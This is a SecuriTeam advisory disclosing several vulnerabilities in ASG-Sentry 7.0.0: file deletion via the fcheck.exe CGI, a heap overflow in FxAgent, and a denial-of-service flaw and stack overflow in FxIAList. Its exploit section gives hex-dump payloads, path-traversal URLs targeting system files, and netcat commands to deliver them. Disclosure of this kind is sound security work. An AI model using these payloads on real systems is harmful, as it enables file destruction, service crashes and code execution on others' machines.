[NEWS] ASG-Sentry Multiple Vulnerabilities



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



ASG-Sentry Multiple Vulnerabilities
------------------------------------------------------------------------


SUMMARY

"The <http://www.asg-sentry.com> ASG-Sentry family of products is a suite
of tools strategically engineered to control, monitor, manage, and enhance
your network. Sentry's tools provide you with full visibility to your
network from any Web browser. Sentry also allows you to fully instrument
your company's applications, CPUs, disk space, memory, files, Windows and
UNIX platforms, and more." Multiple vulnerabilities have been discovered
in ASG-Sentry, these vulnerabilities allow remote attackers to cause the
product to delete arbitrary files, cause the product to crash and overflow
an internal buffer allowing the execution of arbitrary code.

DETAILS

Vulnerable Systems:
* ASG-Sentry version 7.0.0

Arbitrary files deletion
The fcheck.exe (File Check Utility) CGI available in ASG is used for
handling some index files which contain a list of filenames and checksums.

The -b option of this utility allows the creation of these index files and
is possible to specify both the name of the output file and, optionally,
the folder which will be scanned recursively for finding and reading the
various files to add to the list.

The first vulnerability is in the possibility for an external attacker to
use this CGI for overwriting existent files with no data (specifying a new
folder which will be created by the same program) or with the list of
filenames described before.

Naturally is possible to specify both files on the local disks or on
network shares.

The second effect instead is the possibility of occupying CPU and disk for
the scanning of any file in the disk simply specyfing, for example, c:\ as
folder.

Heap-overflow in FxAgent
The FxAgent process running on UDP port 6161 is used for handling the
various SNMP requests. A community field longer than 64 bytes can be used
by an attacker to exploit a heap-overflow.

Termination of FxIAList
FxIAList is a service which runs on the TCP port 6162 and is used for the
logging operations which include the commands "exit", "trace on"
"verbose", "trace off" and the name of the log file to create (xxxx.xx.xx)
and its content. The main problem is that the server doesn't require
authentication so anyone can send the "exit" command and the service will
just terminate.

Buffer overflow in FxIAList
The same service described before is affected also by a stack based
buffer-overflow which happens during the copying of the data we want to
write to the log file (max 1023 bytes) in a buffer of only 500.

Exploits:
asgulo_fxagent.txt:
0000000 2330 0102 0400 41ff 4141 4141 4141 4141
0000010 4141 4141 4141 4141 4141 4141 4141 4141
*
0000100 4141 4141 4141 16a1 0102 0236 0001 0102
0000110 3000 300b 0609 2b05 0106 0102 0005
000011e

asgulo-ialist1.txt:
0000000 7865 7469
0000004

asgulo-ialist2.txt:
0000000 3231 3433 3635 3837 4141 4141 4141 4141
0000010 4141 4141 4141 4141 4141 4141 4141 4141
*
00003f0 4141 4141 4141 4141 4141 4141 7c41 007c
00003ff

Arbitrary files deletion
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+..\../..\boot.ini
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+c:\windows\win.ini
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+c:\file.txt+c:\
http://SERVER:6161/snmx-cgi/fcheck.exe?-b+\host\document.txt
this link for the network share is correct because Apache converts any
backslash to double so that one becomes \\host\\document.txt

Heap-overflow in FxAgent
nc SERVER 6161 -v -v -u < asgulo_fxagent.txt

Termination of FxIAList
nc SERVER 6162 -v -v -w 1 < asgulo-ialist1.txt

Buffer overflow in FxIAList
nc SERVER 6162 -v -v -w 1 < asgulo-ialist2.txt


ADDITIONAL INFORMATION

The information has been provided by <mailto:aluigi@xxxxxxxxxxxxx> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/asgulo-adv.txt>
http://aluigi.altervista.org/adv/asgulo-adv.txt



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [UNIX] libnemesi Multiple Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... overflow vulnerabilities have been discovered in libnemesi. ... Buffer overflow in handle_rtsp_pkt ...
    (Securiteam)
  • [UNIX] LibSPF2 DNS TXT Record Parsing Bug
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... LibSPF2 DNS TXT Record Parsing Bug ... rdlen byte buffer. ...
    (Securiteam)
  • [EXPL] NetTerms NetFTPd Buffer Overflow (USER, Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Win32 telnet client software - "NetTerm is a network terminal which can ... NetTerm's NetFTPd has a buffer overflow on authentication buffer. ... def setebpaddr: ...
    (Securiteam)
  • [UNIX] Conquest Client Buffer Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Conquest Client Buffer Overflow ... SP_CLIENTSTAT is a type of packet used by the server for sending some ...
    (Securiteam)
  • [EXPL] Pavuk Digest Authentication Buffer Overflow Exploit
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Authentication Buffer Overflow Vulnerabilities, a buffer overflow ... char *method; ... * the auth_digest pointer, the user pointer, and the buf pointer. ...
    (Securiteam)